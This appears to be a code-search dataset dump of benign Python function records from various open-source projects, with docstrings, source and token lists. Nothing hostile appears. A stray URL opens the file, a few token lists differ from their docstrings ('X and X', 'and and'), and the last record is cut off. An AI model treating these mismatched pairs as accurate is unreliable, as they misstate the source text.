url: https://github.com/kubernetes-client/python/blob/47b9da9de2d02b2b7a34fbe05afb44afd130d73a/kubernetes/client/models/v1_volume.py#L231-L239

nwo: oracle/graalpython
sha: 577e02da9755d916056184ec441c26e00b70145c
path: graalpython/lib-python/3/tkinter/__init__.py
language: python
identifier: Wm.wm_iconposition
parameters: (self, x=None, y=None)
return_statement: return self._getints(self.tk.call( 'wm', 'iconposition', self._w, x, y))
docstring: Set the position of the icon of this widget to X and Y. Return a tuple of the current values of X and Y if None is given.
docstring_summary: Set the position of the icon of this widget to X and Y. Return a tuple of the current values of X and Y if None is given.
docstring_tokens:
[ "Set", "the", "position", "of", "the", "icon", "of", "this", "widget", "to", "X", "and", "Y", ".", "Return", "a", "tuple", "of", "the", "current", "values", "of", "X", "and", "X", "if", "None", "is", "given", "." ]
function:

    def wm_iconposition(self, x=None, y=None):
        """Set the position of the icon of this widget to X and Y. Return
        a tuple of the current values of X and Y if None is given."""
        return self._getints(self.tk.call(
            'wm', 'iconposition', self._w, x, y))

function_tokens:
[ "def", "wm_iconposition", "(", "self", ",", "x", "=", "None", ",", "y", "=", "None", ")", ":", "return", "self", ".", "_getints", "(", "self", ".", "tk", ".", "call", "(", "'wm'", ",", "'iconposition'", ",", "self", ".", "_w", ",", "x", ",", "y", ")", ")" ]
url: https://github.com/oracle/graalpython/blob/577e02da9755d916056184ec441c26e00b70145c/graalpython/lib-python/3/tkinter/__init__.py#L2122-L2126

nwo: evhub/coconut
sha: 27a4af9dc06667870f736f20c862930001b8cbb2
path: coconut/icoconut/root.py
language: python
identifier: memoized_parse_block
parameters: (code)
docstring: Memoized version of parse_block.
docstring_summary: Memoized version of parse_block.
docstring_tokens:
[ "Memoized", "version", "of", "parse_block", "." ]
function:

    def memoized_parse_block(code):
        """Memoized version of parse_block."""
        internal_assert(lambda: code not in parse_block_memo.values(),
                        "attempted recompilation of", code)
        success, result = parse_block_memo.get(code, (None, None))
        if success is None:
            try:
                parsed = COMPILER.parse_block(code)
            except Exception as err:
                success, result = False, err
            else:
                success, result = True, parsed
            parse_block_memo[code] = (success, result)
        if success:
            return result
        else:
            raise result

function_tokens:
[ "def", "memoized_parse_block", "(", "code", ")", ":", "internal_assert", "(", "lambda", ":", "code", "not", "in", "parse_block_memo", ".", "values", "(", ")", ",", "\"attempted recompilation of\"", ",", "code", ")", "success", ",", "result", "=", "parse_block_memo", ".", "get", "(", "code", ",", "(", "None", ",", "None", ")", ")", "if", "success", "is", "None", ":", "try", ":", "parsed", "=", "COMPILER", ".", "parse_block", "(", "code", ")", "except", "Exception", "as", "err", ":", "success", ",", "result", "=", "False", ",", "err", "else", ":", "success", ",", "result", "=", "True", ",", "parsed", "parse_block_memo", "[", "code", "]", "=", "(", "success", ",", "result", ")", "if", "success", ":", "return", "result", "else", ":", "raise", "result" ]
url: https://github.com/evhub/coconut/blob/27a4af9dc06667870f736f20c862930001b8cbb2/coconut/icoconut/root.py#L94-L109

nwo: hyperspy/hyperspy
sha: 1ffb3fab33e607045a37f30c1463350b72617e10
path: hyperspy/misc/eds/utils.py
language: python
identifier: electron_range
parameters: (element, beam_energy, density='auto', tilt=0)
return_statement: return (0.0276 * A / np.power(Z, 0.89) / density * np.power(beam_energy, 1.67) * math.cos(math.radians(tilt)))
docstring: Returns the maximum electron range for a pure bulk material according to the Kanaya-Okayama parameterization. Parameters ---------- element: str The element symbol, e.g. 'Al'. beam_energy: float The energy of the beam in keV. density: {float, 'auto'} The density of the material in g/cm3. If 'auto', the density of the pure element is used. tilt: float. The tilt of the sample in degrees. Returns ------- Electron range in micrometers. Examples -------- >>> # Electron range in pure Copper at 30 kV in micron >>> hs.eds.electron_range('Cu', 30.) 2.8766744984001607 Notes ----- From Kanaya, K. and S. Okayama (1972). J. Phys. D. Appl. Phys. 5, p43 See also the textbook of Goldstein et al., Plenum publisher, third edition p 72.
docstring_summary: Returns the maximum electron range for a pure bulk material according to the Kanaya-Okayama parameterization.
docstring_tokens:
[ "Returns", "the", "maximum", "electron", "range", "for", "a", "pure", "bulk", "material", "according", "to", "the", "Kanaya", "-", "Okayama", "parameterziation", "." ]
function:

    def electron_range(element, beam_energy, density='auto', tilt=0):
        """Returns the maximum electron range for a pure bulk material
        according to the Kanaya-Okayama parameterization.

        Parameters
        ----------
        element: str
            The element symbol, e.g. 'Al'.
        beam_energy: float
            The energy of the beam in keV.
        density: {float, 'auto'}
            The density of the material in g/cm3. If 'auto', the density
            of the pure element is used.
        tilt: float.
            The tilt of the sample in degrees.

        Returns
        -------
        Electron range in micrometers.

        Examples
        --------
        >>> # Electron range in pure Copper at 30 kV in micron
        >>> hs.eds.electron_range('Cu', 30.)
        2.8766744984001607

        Notes
        -----
        From Kanaya, K. and S. Okayama (1972). J. Phys. D. Appl. Phys. 5, p43

        See also the textbook of Goldstein et al., Plenum publisher,
        third edition p 72.
        """
        if density == 'auto':
            density = elements_db[
                element]['Physical_properties']['density (g/cm^3)']
        Z = elements_db[element]['General_properties']['Z']
        A = elements_db[element]['General_properties']['atomic_weight']
        # Note: magic numbers here are from Kanaya-Okayama parameterization.
        # See docstring for associated references.
        return (0.0276 * A / np.power(Z, 0.89) / density *
                np.power(beam_energy, 1.67) * math.cos(math.radians(tilt)))

function_tokens:
[ "def", "electron_range", "(", "element", ",", "beam_energy", ",", "density", "=", "'auto'", ",", "tilt", "=", "0", ")", ":", "if", "density", "==", "'auto'", ":", "density", "=", "elements_db", "[", "element", "]", "[", "'Physical_properties'", "]", "[", "'density (g/cm^3)'", "]", "Z", "=", "elements_db", "[", "element", "]", "[", "'General_properties'", "]", "[", "'Z'", "]", "A", "=", "elements_db", "[", "element", "]", "[", "'General_properties'", "]", "[", "'atomic_weight'", "]", "# Note: magic numbers here are from Kanaya-Okayama parameterization. See", "# docstring for associated references.", "return", "(", "0.0276", "*", "A", "/", "np", ".", "power", "(", "Z", ",", "0.89", ")", "/", "density", "*", "np", ".", "power", "(", "beam_energy", ",", "1.67", ")", "*", "math", ".", "cos", "(", "math", ".", "radians", "(", "tilt", ")", ")", ")" ]
url: https://github.com/hyperspy/hyperspy/blob/1ffb3fab33e607045a37f30c1463350b72617e10/hyperspy/misc/eds/utils.py#L210-L253

nwo: simonw/sqlite-utils
sha: e0c476bc380744680c8b7675c24fb0e9f5ec6dcd
path: sqlite_utils/db.py
language: python
identifier: Database.execute
parameters: ( self, sql: str, parameters: Optional[Union[Iterable, dict]] = None )
docstring: Execute SQL query and return a ``sqlite3.Cursor``.
docstring_summary: Execute SQL query and return a ``sqlite3.Cursor``.
docstring_tokens:
[ "Execute", "SQL", "query", "and", "return", "a", "sqlite3", ".", "Cursor", "." ]
function:

    def execute(
        self, sql: str, parameters: Optional[Union[Iterable, dict]] = None
    ) -> sqlite3.Cursor:
        "Execute SQL query and return a ``sqlite3.Cursor``."
        if self._tracer:
            self._tracer(sql, parameters)
        if parameters is not None:
            return self.conn.execute(sql, parameters)
        else:
            return self.conn.execute(sql)

function_tokens:
[ "def", "execute", "(", "self", ",", "sql", ":", "str", ",", "parameters", ":", "Optional", "[", "Union", "[", "Iterable", ",", "dict", "]", "]", "=", "None", ")", "->", "sqlite3", ".", "Cursor", ":", "if", "self", ".", "_tracer", ":", "self", ".", "_tracer", "(", "sql", ",", "parameters", ")", "if", "parameters", "is", "not", "None", ":", "return", "self", ".", "conn", ".", "execute", "(", "sql", ",", "parameters", ")", "else", ":", "return", "self", ".", "conn", ".", "execute", "(", "sql", ")" ]
url: https://github.com/simonw/sqlite-utils/blob/e0c476bc380744680c8b7675c24fb0e9f5ec6dcd/sqlite_utils/db.py#L417-L426

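A usage sketch with sqlite-utils; since execute() is a thin wrapper over the underlying sqlite3 connection, the return value is a plain sqlite3.Cursor:

    from sqlite_utils import Database

    db = Database(memory=True)
    db["people"].insert({"name": "Cleo", "age": 4})

    # parameters may be a sequence (for ?) or a dict (for :name placeholders)
    cursor = db.execute("select name, age from people where age > ?", [2])
    print(cursor.fetchall())  # [('Cleo', 4)]
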
nwo: leo-editor/leo-editor
sha: 383d6776d135ef17d73d935a2f0ecb3ac0e99494
path: leo/plugins/obsolete/tkGui.py
language: python
identifier: tkinterGui.get_focus
parameters: (self, c)
docstring: Returns the widget that has focus, or body if None.
docstring_summary: Returns the widget that has focus, or body if None.
docstring_tokens:
[ "Returns", "the", "widget", "that", "has", "focus", "or", "body", "if", "None", "." ]
function:

    def get_focus(self, c):
        """Returns the widget that has focus, or body if None."""
        try:
            return c.frame.top.focus_displayof()
        except Exception:
            if g.unitTesting:
                g.es_exception()
            return None

function_tokens:
[ "def", "get_focus", "(", "self", ",", "c", ")", ":", "try", ":", "return", "c", ".", "frame", ".", "top", ".", "focus_displayof", "(", ")", "except", "Exception", ":", "if", "g", ".", "unitTesting", ":", "g", ".", "es_exception", "(", ")", "return", "None" ]
url: https://github.com/leo-editor/leo-editor/blob/383d6776d135ef17d73d935a2f0ecb3ac0e99494/leo/plugins/obsolete/tkGui.py#L500-L509

nwo: seantis/seantis-questionnaire
sha: 698c77b3d707635f50bcd86e7f1c94e94061b0f5
path: questionnaire/templatetags/questionnaire.py
language: python
identifier: dictget
parameters: (thedict, key)
return_statement: return thedict.get(key, None)
docstring: {{ dictionary|dictget:variableholdingkey }}
docstring_summary: {{ dictionary|dictget:variableholdingkey }}
docstring_tokens:
[ "{{", "dictionary|dictget", ":", "variableholdingkey", "}}" ]
function:

    def dictget(thedict, key):
        "{{ dictionary|dictget:variableholdingkey }}"
        return thedict.get(key, None)

function_tokens:
[ "def", "dictget", "(", "thedict", ",", "key", ")", ":", "return", "thedict", ".", "get", "(", "key", ",", "None", ")" ]
url: https://github.com/seantis/seantis-questionnaire/blob/698c77b3d707635f50bcd86e7f1c94e94061b0f5/questionnaire/templatetags/questionnaire.py#L9-L11

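For context, a sketch of how a Django template filter like this is registered (the register object is assumed to be defined at the top of the templatetags module, as Django requires):

    from django import template

    register = template.Library()

    @register.filter
    def dictget(thedict, key):
        "{{ dictionary|dictget:variableholdingkey }}"
        return thedict.get(key, None)

In a template, {{ scores|dictget:player }} then evaluates to scores.get(player), which is the only way to index a dict by a variable key in Django's template language.
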
nwo: scikit-hep/root_numpy
sha: b062fefe5ee8164aea6c90d7d4435890a87dc112
path: docs/sphinxext/numpydoc/compiler_unparse.py
language: python
identifier: UnparseCompilerAst._From
parameters: (self, t)
docstring: Handle "from xyz import foo, bar as baz".
docstring_summary: Handle "from xyz import foo, bar as baz".
docstring_tokens:
[ "Handle", "from", "xyz", "import", "foo", "bar", "as", "baz", "." ]
function:

    def _From(self, t):
        """ Handle "from xyz import foo, bar as baz". """
        # fixme: Are From and ImportFrom handled differently?
        self._fill("from ")
        self._write(t.modname)
        self._write(" import ")
        for i, (name, asname) in enumerate(t.names):
            if i != 0:
                self._write(", ")
            self._write(name)
            if asname is not None:
                self._write(" as " + asname)

function_tokens:
[ "def", "_From", "(", "self", ",", "t", ")", ":", "# fixme: Are From and ImportFrom handled differently?", "self", ".", "_fill", "(", "\"from \"", ")", "self", ".", "_write", "(", "t", ".", "modname", ")", "self", ".", "_write", "(", "\" import \"", ")", "for", "i", ",", "(", "name", ",", "asname", ")", "in", "enumerate", "(", "t", ".", "names", ")", ":", "if", "i", "!=", "0", ":", "self", ".", "_write", "(", "\", \"", ")", "self", ".", "_write", "(", "name", ")", "if", "asname", "is", "not", "None", ":", "self", ".", "_write", "(", "\" as \"", "+", "asname", ")" ]
url: https://github.com/scikit-hep/root_numpy/blob/b062fefe5ee8164aea6c90d7d4435890a87dc112/docs/sphinxext/numpydoc/compiler_unparse.py#L244-L256

nwo: codelv/enaml-native
sha: 04c3a015bcd649f374c5ecd98fcddba5e4fbdbdc
path: src/enamlnative/core/eventloop/gen.py
language: python
identifier: multi_future
parameters: (children, quiet_exceptions=())
return_statement: return future
docstring: Wait for multiple asynchronous futures in parallel. This function is similar to `multi`, but does not support `YieldPoints <YieldPoint>`. .. versionadded:: 4.0 .. versionchanged:: 4.2 If multiple ``Futures`` fail, any exceptions after the first (which is raised) will be logged. Added the ``quiet_exceptions`` argument to suppress this logging for selected exception types. .. deprecated:: 4.3 Use `multi` instead.
docstring_summary: Wait for multiple asynchronous futures in parallel.
docstring_tokens:
[ "Wait", "for", "multiple", "asynchronous", "futures", "in", "parallel", "." ]
function:

    def multi_future(children, quiet_exceptions=()):
        """Wait for multiple asynchronous futures in parallel.

        This function is similar to `multi`, but does not support
        `YieldPoints <YieldPoint>`.

        .. versionadded:: 4.0

        .. versionchanged:: 4.2
           If multiple ``Futures`` fail, any exceptions after the first (which
           is raised) will be logged. Added the ``quiet_exceptions`` argument
           to suppress this logging for selected exception types.

        .. deprecated:: 4.3
           Use `multi` instead.
        """
        if isinstance(children, dict):
            keys = list(children.keys())
            children = children.values()
        else:
            keys = None
        children = list(map(convert_yielded, children))
        assert all(is_future(i) for i in children)
        unfinished_children = set(children)

        future = Future()
        if not children:
            future.set_result({} if keys is not None else [])

        def callback(f):
            unfinished_children.remove(f)
            if not unfinished_children:
                result_list = []
                for f in children:
                    try:
                        result_list.append(f.result())
                    except Exception as e:
                        if future.done():
                            if not isinstance(e, quiet_exceptions):
                                app_log.error("Multiple exceptions in yield list",
                                              exc_info=True)
                        else:
                            future.set_exc_info(sys.exc_info())
                if not future.done():
                    if keys is not None:
                        future.set_result(dict(zip(keys, result_list)))
                    else:
                        future.set_result(result_list)

        listening = set()
        for f in children:
            if f not in listening:
                listening.add(f)
                f.add_done_callback(callback)
        return future

function_tokens:
[ "def", "multi_future", "(", "children", ",", "quiet_exceptions", "=", "(", ")", ")", ":", "if", "isinstance", "(", "children", ",", "dict", ")", ":", "keys", "=", "list", "(", "children", ".", "keys", "(", ")", ")", "children", "=", "children", ".", "values", "(", ")", "else", ":", "keys", "=", "None", "children", "=", "list", "(", "map", "(", "convert_yielded", ",", "children", ")", ")", "assert", "all", "(", "is_future", "(", "i", ")", "for", "i", "in", "children", ")", "unfinished_children", "=", "set", "(", "children", ")", "future", "=", "Future", "(", ")", "if", "not", "children", ":", "future", ".", "set_result", "(", "{", "}", "if", "keys", "is", "not", "None", "else", "[", "]", ")", "def", "callback", "(", "f", ")", ":", "unfinished_children", ".", "remove", "(", "f", ")", "if", "not", "unfinished_children", ":", "result_list", "=", "[", "]", "for", "f", "in", "children", ":", "try", ":", "result_list", ".", "append", "(", "f", ".", "result", "(", ")", ")", "except", "Exception", "as", "e", ":", "if", "future", ".", "done", "(", ")", ":", "if", "not", "isinstance", "(", "e", ",", "quiet_exceptions", ")", ":", "app_log", ".", "error", "(", "\"Multiple exceptions in yield list\"", ",", "exc_info", "=", "True", ")", "else", ":", "future", ".", "set_exc_info", "(", "sys", ".", "exc_info", "(", ")", ")", "if", "not", "future", ".", "done", "(", ")", ":", "if", "keys", "is", "not", "None", ":", "future", ".", "set_result", "(", "dict", "(", "zip", "(", "keys", ",", "result_list", ")", ")", ")", "else", ":", "future", ".", "set_result", "(", "result_list", ")", "listening", "=", "set", "(", ")", "for", "f", "in", "children", ":", "if", "f", "not", "in", "listening", ":", "listening", ".", "add", "(", "f", ")", "f", ".", "add_done_callback", "(", "callback", ")", "return", "future" ]
url: https://github.com/codelv/enaml-native/blob/04c3a015bcd649f374c5ecd98fcddba5e4fbdbdc/src/enamlnative/core/eventloop/gen.py#L818-L872

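A usage sketch assuming the canonical Tornado 4.x API that this vendored module mirrors; double() is a made-up coroutine standing in for real async work:

    from tornado import gen
    from tornado.ioloop import IOLoop

    @gen.coroutine
    def double(x):
        yield gen.sleep(0.01)        # pretend this is real async work
        raise gen.Return(2 * x)

    @gen.coroutine
    def main():
        # results arrive in input order; a dict input would preserve keys
        results = yield gen.multi_future([double(1), double(2), double(3)])
        print(results)               # [2, 4, 6]

    IOLoop.current().run_sync(main)
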
nwo: deanishe/alfred-stackexchange
sha: b2047b76165900d55f0c7d18fd7c40131bee94ed
path: src/workflow/workflow.py
language: python
identifier: Workflow.logfile
parameters: (self)
return_statement: return self.cachefile('%s.log' % self.bundleid)
docstring: Path to logfile. :returns: path to logfile within workflow's cache directory :rtype: ``unicode``
docstring_summary: Path to logfile.
docstring_tokens:
[ "Path", "to", "logfile", "." ]
function:

    def logfile(self):
        """Path to logfile.

        :returns: path to logfile within workflow's cache directory
        :rtype: ``unicode``
        """
        return self.cachefile('%s.log' % self.bundleid)

function_tokens:
[ "def", "logfile", "(", "self", ")", ":", "return", "self", ".", "cachefile", "(", "'%s.log'", "%", "self", ".", "bundleid", ")" ]
url: https://github.com/deanishe/alfred-stackexchange/blob/b2047b76165900d55f0c7d18fd7c40131bee94ed/src/workflow/workflow.py#L1372-L1379

nwo: tendenci/tendenci
sha: 0f2c348cc0e7d41bc56f50b00ce05544b083bf1d
path: tendenci/apps/events/models.py
language: python
identifier: Registration.make_acct_entries
parameters: (self, user, inv, amount, **kwargs)
docstring: Make the accounting entries for the event sale
docstring_summary: Make the accounting entries for the event sale
docstring_tokens:
[ "Make", "the", "accounting", "entries", "for", "the", "event", "sale" ]
function:

    def make_acct_entries(self, user, inv, amount, **kwargs):
        """
        Make the accounting entries for the event sale
        """
        from tendenci.apps.accountings.models import Acct, AcctEntry, AcctTran
        from tendenci.apps.accountings.utils import make_acct_entries_initial, make_acct_entries_closing

        ae = AcctEntry.objects.create_acct_entry(user, 'invoice', inv.id)
        if not inv.is_tendered:
            make_acct_entries_initial(user, ae, amount)
        else:
            # payment has now been received
            make_acct_entries_closing(user, ae, amount)

            # #CREDIT event SALES
            acct_number = self.get_acct_number()
            acct = Acct.objects.get(account_number=acct_number)
            AcctTran.objects.create_acct_tran(user, ae, acct, amount*(-1))

function_tokens:
[ "def", "make_acct_entries", "(", "self", ",", "user", ",", "inv", ",", "amount", ",", "*", "*", "kwargs", ")", ":", "from", "tendenci", ".", "apps", ".", "accountings", ".", "models", "import", "Acct", ",", "AcctEntry", ",", "AcctTran", "from", "tendenci", ".", "apps", ".", "accountings", ".", "utils", "import", "make_acct_entries_initial", ",", "make_acct_entries_closing", "ae", "=", "AcctEntry", ".", "objects", ".", "create_acct_entry", "(", "user", ",", "'invoice'", ",", "inv", ".", "id", ")", "if", "not", "inv", ".", "is_tendered", ":", "make_acct_entries_initial", "(", "user", ",", "ae", ",", "amount", ")", "else", ":", "# payment has now been received", "make_acct_entries_closing", "(", "user", ",", "ae", ",", "amount", ")", "# #CREDIT event SALES", "acct_number", "=", "self", ".", "get_acct_number", "(", ")", "acct", "=", "Acct", ".", "objects", ".", "get", "(", "account_number", "=", "acct_number", ")", "AcctTran", ".", "objects", ".", "create_acct_tran", "(", "user", ",", "ae", ",", "acct", ",", "amount", "*", "(", "-", "1", ")", ")" ]
url: https://github.com/tendenci/tendenci/blob/0f2c348cc0e7d41bc56f50b00ce05544b083bf1d/tendenci/apps/events/models.py#L573-L590

nwo: p5py/p5
sha: 4ef1580b26179f1973c1669751da4522c5823f17
path: p5/pmath/rand.py
language: python
identifier: noise_detail
parameters: (octaves=4, falloff=0.5)
docstring: Adjust the level of noise detail produced by noise(). :param octaves: The number of octaves to compute the noise for (defaults to 4). :type octaves: int :param falloff: :type falloff: float :note: For :code:`falloff` values greater than 0.5, :code:`noise()` will return values greater than 1.0.
docstring_summary: Adjust the level of noise detail produced by noise().
docstring_tokens:
[ "Adjust", "the", "level", "of", "noise", "detail", "produced", "by", "noise", "()", "." ]
function:

    def noise_detail(octaves=4, falloff=0.5):
        """Adjust the level of noise detail produced by noise().

        :param octaves: The number of octaves to compute the noise for
            (defaults to 4).
        :type octaves: int

        :param falloff:
        :type falloff: float

        :note: For :code:`falloff` values greater than 0.5, :code:`noise()`
            will return values greater than 1.0.
        """
        global PERLIN_OCTAVES
        global PERLIN_FALLOFF

        if octaves > 0:
            PERLIN_OCTAVES = octaves
        PERLIN_FALLOFF = constrain(falloff, 0, 1)

function_tokens:
[ "def", "noise_detail", "(", "octaves", "=", "4", ",", "falloff", "=", "0.5", ")", ":", "global", "PERLIN_OCTAVES", "global", "PERLIN_FALLOFF", "if", "octaves", ">", "0", ":", "PERLIN_OCTAVES", "=", "octaves", "PERLIN_FALLOFF", "=", "constrain", "(", "falloff", ",", "0", ",", "1", ")" ]
url: https://github.com/p5py/p5/blob/4ef1580b26179f1973c1669751da4522c5823f17/p5/pmath/rand.py#L175-L194

nwo: frescobaldi/frescobaldi
sha: 301cc977fc4ba7caa3df9e4bf905212ad5d06912
path: frescobaldi_app/preferences/extensions.py
language: python
identifier: Config.saveSettings
parameters: (self)
docstring: Ask all extension configuration widgets to save their settings. Configuration widgets are required to implement save_settings().
docstring_summary: Ask all extension configuration widgets to save their settings. Configuration widgets are required to implement save_settings().
docstring_tokens:
[ "Ask", "all", "extension", "configuration", "widgets", "to", "save", "their", "settings", ".", "Configuration", "widgets", "are", "required", "to", "implement", "save_settings", "()", "." ]
function:

    def saveSettings(self):
        """Ask all extension configuration widgets to save their settings.
        Configuration widgets are required to implement save_settings()."""
        for widget in self._widgets.values():
            if widget:
                widget.save_settings()

function_tokens:
[ "def", "saveSettings", "(", "self", ")", ":", "for", "widget", "in", "self", ".", "_widgets", ".", "values", "(", ")", ":", "if", "widget", ":", "widget", ".", "save_settings", "(", ")" ]
url: https://github.com/frescobaldi/frescobaldi/blob/301cc977fc4ba7caa3df9e4bf905212ad5d06912/frescobaldi_app/preferences/extensions.py#L335-L340

nwo: mozilla/treeherder
sha: 228750c5774cfbe7d395e10e2c84665d9122496d
path: treeherder/model/models.py
language: python
identifier: ClassifiedFailure.replace_with
parameters: (self, other)
docstring: Replace this instance with the given other. Deletes stale Match objects and updates related TextLogErrorMetadatas' best_classifications to point to the given other.
docstring_summary: Replace this instance with the given other.
docstring_tokens:
[ "Replace", "this", "instance", "with", "the", "given", "other", "." ]
function:

    def replace_with(self, other):
        """
        Replace this instance with the given other.

        Deletes stale Match objects and updates related
        TextLogErrorMetadatas' best_classifications to point to the given
        other.
        """
        match_ids_to_delete = list(self.update_matches(other))
        TextLogErrorMatch.objects.filter(id__in=match_ids_to_delete).delete()

        # Update best classifications
        self.best_for_errors.update(best_classification=other)

        self.delete()

function_tokens:
[ "def", "replace_with", "(", "self", ",", "other", ")", ":", "match_ids_to_delete", "=", "list", "(", "self", ".", "update_matches", "(", "other", ")", ")", "TextLogErrorMatch", ".", "objects", ".", "filter", "(", "id__in", "=", "match_ids_to_delete", ")", ".", "delete", "(", ")", "# Update best classifications", "self", ".", "best_for_errors", ".", "update", "(", "best_classification", "=", "other", ")", "self", ".", "delete", "(", ")" ]
url: https://github.com/mozilla/treeherder/blob/228750c5774cfbe7d395e10e2c84665d9122496d/treeherder/model/models.py#L1176-L1189

nwo: eBay/accelerator
sha: 218d9a5e4451ac72b9e65df6c5b32e37d25136c8
path: accelerator/dsutil.py
language: python
identifier: ReadJson.__init__
parameters: (self, *a, **kw)
docstring_tokens:
[]
function:

    def __init__(self, *a, **kw):
        if PY3:
            self.fh = _dsutil.ReadUnicode(*a, **kw)
        else:
            self.fh = _dsutil.ReadBytes(*a, **kw)
        self.decode = JSONDecoder().decode

function_tokens:
[ "def", "__init__", "(", "self", ",", "*", "a", ",", "*", "*", "kw", ")", ":", "if", "PY3", ":", "self", ".", "fh", "=", "_dsutil", ".", "ReadUnicode", "(", "*", "a", ",", "*", "*", "kw", ")", "else", ":", "self", ".", "fh", "=", "_dsutil", ".", "ReadBytes", "(", "*", "a", ",", "*", "*", "kw", ")", "self", ".", "decode", "=", "JSONDecoder", "(", ")", ".", "decode" ]
url: https://github.com/eBay/accelerator/blob/218d9a5e4451ac72b9e65df6c5b32e37d25136c8/accelerator/dsutil.py#L117-L122

nwo: IJDykeman/wangTiles
sha: 7c1ee2095ebdf7f72bce07d94c6484915d5cae8b
path: experimental_code/tiles_3d/venv/lib/python2.7/site-packages/pip/_vendor/requests/models.py
language: python
identifier: PreparedRequest.prepare_headers
parameters: (self, headers)
docstring: Prepares the given HTTP headers.
docstring_summary: Prepares the given HTTP headers.
docstring_tokens:
[ "Prepares", "the", "given", "HTTP", "headers", "." ]
function:

    def prepare_headers(self, headers):
        """Prepares the given HTTP headers."""

        if headers:
            self.headers = CaseInsensitiveDict((to_native_string(name), value)
                                               for name, value in headers.items())
        else:
            self.headers = CaseInsensitiveDict()

function_tokens:
[ "def", "prepare_headers", "(", "self", ",", "headers", ")", ":", "if", "headers", ":", "self", ".", "headers", "=", "CaseInsensitiveDict", "(", "(", "to_native_string", "(", "name", ")", ",", "value", ")", "for", "name", ",", "value", "in", "headers", ".", "items", "(", ")", ")", "else", ":", "self", ".", "headers", "=", "CaseInsensitiveDict", "(", ")" ]
url: https://github.com/IJDykeman/wangTiles/blob/7c1ee2095ebdf7f72bce07d94c6484915d5cae8b/experimental_code/tiles_3d/venv/lib/python2.7/site-packages/pip/_vendor/requests/models.py#L383-L389

nwo: securesystemslab/zippy
sha: ff0e84ac99442c2c55fe1d285332cfd4e185e089
path: zippy/benchmarks/src/benchmarks/sympy/sympy/matrices/matrices.py
language: python
identifier: MatrixBase.is_lower_hessenberg
parameters: (self)
return_statement: return all(self[i, j].is_zero for i in range(self.rows) for j in range(i + 2, self.cols))
docstring: Checks if the matrix is in the lower-Hessenberg form. The lower hessenberg matrix has zero entries above the first superdiagonal. Examples ======== >>> from sympy.matrices import Matrix >>> a = Matrix([[1, 2, 0, 0], [5, 2, 3, 0], [3, 4, 3, 7], [5, 6, 1, 1]]) >>> a Matrix([ [1, 2, 0, 0], [5, 2, 3, 0], [3, 4, 3, 7], [5, 6, 1, 1]]) >>> a.is_lower_hessenberg True See Also ======== is_upper_hessenberg is_lower
docstring_summary: Checks if the matrix is in the lower-Hessenberg form.
docstring_tokens:
[ "r", "Checks", "if", "the", "matrix", "is", "in", "the", "lower", "-", "Hessenberg", "form", "." ]
function:

    def is_lower_hessenberg(self):
        r"""Checks if the matrix is in the lower-Hessenberg form.

        The lower hessenberg matrix has zero entries
        above the first superdiagonal.

        Examples
        ========

        >>> from sympy.matrices import Matrix
        >>> a = Matrix([[1, 2, 0, 0], [5, 2, 3, 0], [3, 4, 3, 7], [5, 6, 1, 1]])
        >>> a
        Matrix([
        [1, 2, 0, 0],
        [5, 2, 3, 0],
        [3, 4, 3, 7],
        [5, 6, 1, 1]])
        >>> a.is_lower_hessenberg
        True

        See Also
        ========

        is_upper_hessenberg
        is_lower
        """
        return all(self[i, j].is_zero
                   for i in range(self.rows)
                   for j in range(i + 2, self.cols))

function_tokens:
[ "def", "is_lower_hessenberg", "(", "self", ")", ":", "return", "all", "(", "self", "[", "i", ",", "j", "]", ".", "is_zero", "for", "i", "in", "range", "(", "self", ".", "rows", ")", "for", "j", "in", "range", "(", "i", "+", "2", ",", "self", ".", "cols", ")", ")" ]
url: https://github.com/securesystemslab/zippy/blob/ff0e84ac99442c2c55fe1d285332cfd4e185e089/zippy/benchmarks/src/benchmarks/sympy/sympy/matrices/matrices.py#L2161-L2189

nwo: econchick/interrogate
sha: ad955b82c5b164a1fe900dd6928fd4bab4d9a8ac
path: docs/conf.py
language: python
identifier: read
parameters: (*parts)
docstring: Build an absolute path from *parts* and return the contents of the resulting file. Assume UTF-8 encoding.
docstring_summary: Build an absolute path from *parts* and return the contents of the resulting file. Assume UTF-8 encoding.
docstring_tokens:
[ "Build", "an", "absolute", "path", "from", "*", "parts", "*", "and", "and", "return", "the", "contents", "of", "the", "resulting", "file", ".", "Assume", "UTF", "-", "8", "encoding", "." ]
function:

    def read(*parts):
        """
        Build an absolute path from *parts* and return the contents of the
        resulting file. Assume UTF-8 encoding.
        """
        here = os.path.abspath(os.path.dirname(__file__))
        with codecs.open(os.path.join(here, *parts), "rb", "utf-8") as f:
            return f.read()

function_tokens:
[ "def", "read", "(", "*", "parts", ")", ":", "here", "=", "os", ".", "path", ".", "abspath", "(", "os", ".", "path", ".", "dirname", "(", "__file__", ")", ")", "with", "codecs", ".", "open", "(", "os", ".", "path", ".", "join", "(", "here", ",", "*", "parts", ")", ",", "\"rb\"", ",", "\"utf-8\"", ")", "as", "f", ":", "return", "f", ".", "read", "(", ")" ]
url: https://github.com/econchick/interrogate/blob/ad955b82c5b164a1fe900dd6928fd4bab4d9a8ac/docs/conf.py#L6-L13

nwo: studywolf/control
sha: 4e94cb9c10543a5f5e798c0ec2605893bb21c321
path: studywolf_control/controllers/trace.py
language: python
identifier: Shell.check_pen_up
parameters: (self)
docstring: Check to see if the pen should be lifted.
docstring_summary: Check to see if the pen should be lifted.
docstring_tokens:
[ "Check", "to", "see", "if", "the", "pen", "should", "be", "lifted", "." ]
function:

    def check_pen_up(self):
        """Check to see if the pen should be lifted.
        """
        if self.time >= 1. - self.tau:
            self.time = 0.0
            return True
        else:
            return False

function_tokens:
[ "def", "check_pen_up", "(", "self", ")", ":", "if", "self", ".", "time", ">=", "1.", "-", "self", ".", "tau", ":", "self", ".", "time", "=", "0.0", "return", "True", "else", ":", "return", "False" ]
url: https://github.com/studywolf/control/blob/4e94cb9c10543a5f5e798c0ec2605893bb21c321/studywolf_control/controllers/trace.py#L34-L41

nwo: soskek/bert-chainer
sha: 22cc04afff4d31b6a10e36bb32837216ede22a49
path: modeling.py
language: python
identifier: create_attention_mask_from_input_mask
parameters: (from_tensor, to_mask)
return_statement: return mask
docstring: Create 3D attention mask from a 2D tensor mask. Args: from_tensor: 2D or 3D Tensor of shape [batch_size, from_seq_length, ...]. to_mask: int32 Tensor of shape [batch_size, to_seq_length]. Returns: float Tensor of shape [batch_size, from_seq_length, to_seq_length].
docstring_summary: Create 3D attention mask from a 2D tensor mask.
docstring_tokens:
[ "Create", "3D", "attention", "mask", "from", "a", "2D", "tensor", "mask", "." ]
function:

    def create_attention_mask_from_input_mask(from_tensor, to_mask):
        """Create 3D attention mask from a 2D tensor mask.

        Args:
